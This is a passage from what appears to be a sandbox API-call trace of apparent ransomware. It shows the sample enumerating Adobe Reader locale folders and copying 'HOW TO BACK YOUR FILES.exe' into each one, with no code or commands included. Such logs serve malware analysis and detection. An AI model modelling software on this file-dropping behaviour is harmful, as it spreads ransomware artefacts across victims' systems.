10.0\\Reader\\Locale\\uk_UA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA" [0059.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0c88 | out: hHeap=0x2b0000) returned 1 [0059.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0059.299] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA") returned 60 [0059.300] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA" [0059.300] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.300] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.306] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.306] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54d97da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54d97da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.306] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.306] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.307] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services" [0059.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0059.307] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services") returned 69 [0059.307] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services" [0059.307] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.307] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.313] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.313] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54dbdf00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54dbdf00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.313] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.314] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.314] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR" [0059.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0c00 | out: hHeap=0x2b0000) returned 1 [0059.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0059.314] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR") returned 60 [0059.314] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR" [0059.314] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.314] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.321] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.321] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54dbdf00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54dbdf00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.321] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.321] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.322] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services" [0059.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0059.322] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services") returned 69 [0059.322] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services" [0059.322] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.322] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.328] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.328] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54de4060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54de4060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.328] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.328] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.328] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE" [0059.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0b78 | out: hHeap=0x2b0000) returned 1 [0059.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0059.328] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE") returned 60 [0059.328] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE" [0059.328] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.328] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.335] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.335] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54de4060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54de4060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.335] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.335] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.335] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services" [0059.336] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.336] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0059.336] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services") returned 69 [0059.336] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services" [0059.336] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.336] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.342] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54e0a1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54e0a1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.342] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.343] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI" [0059.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0af0 | out: hHeap=0x2b0000) returned 1 [0059.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0059.343] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI") returned 60 [0059.343] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI" [0059.343] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.343] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.349] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.349] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54e0a1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54e0a1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.350] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.350] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.350] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services" [0059.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0059.350] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services") returned 69 [0059.350] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services" [0059.350] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.350] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.363] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.363] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54e0a1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54e0a1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.363] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.363] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.363] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK" [0059.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0a68 | out: hHeap=0x2b0000) returned 1 [0059.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25c0 | out: hHeap=0x2b0000) returned 1 [0059.363] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK") returned 60 [0059.363] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK" [0059.363] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.363] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.375] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.375] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54e56480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54e56480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.375] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.375] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.376] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services" [0059.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25c0 | out: hHeap=0x2b0000) returned 1 [0059.376] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services") returned 69 [0059.376] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services" [0059.376] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.376] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.382] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.382] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54e56480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54e56480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.383] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.383] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.383] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU" [0059.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f09e0 | out: hHeap=0x2b0000) returned 1 [0059.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0059.383] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU") returned 60 [0059.383] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU" [0059.383] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.383] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.389] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.389] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\*", 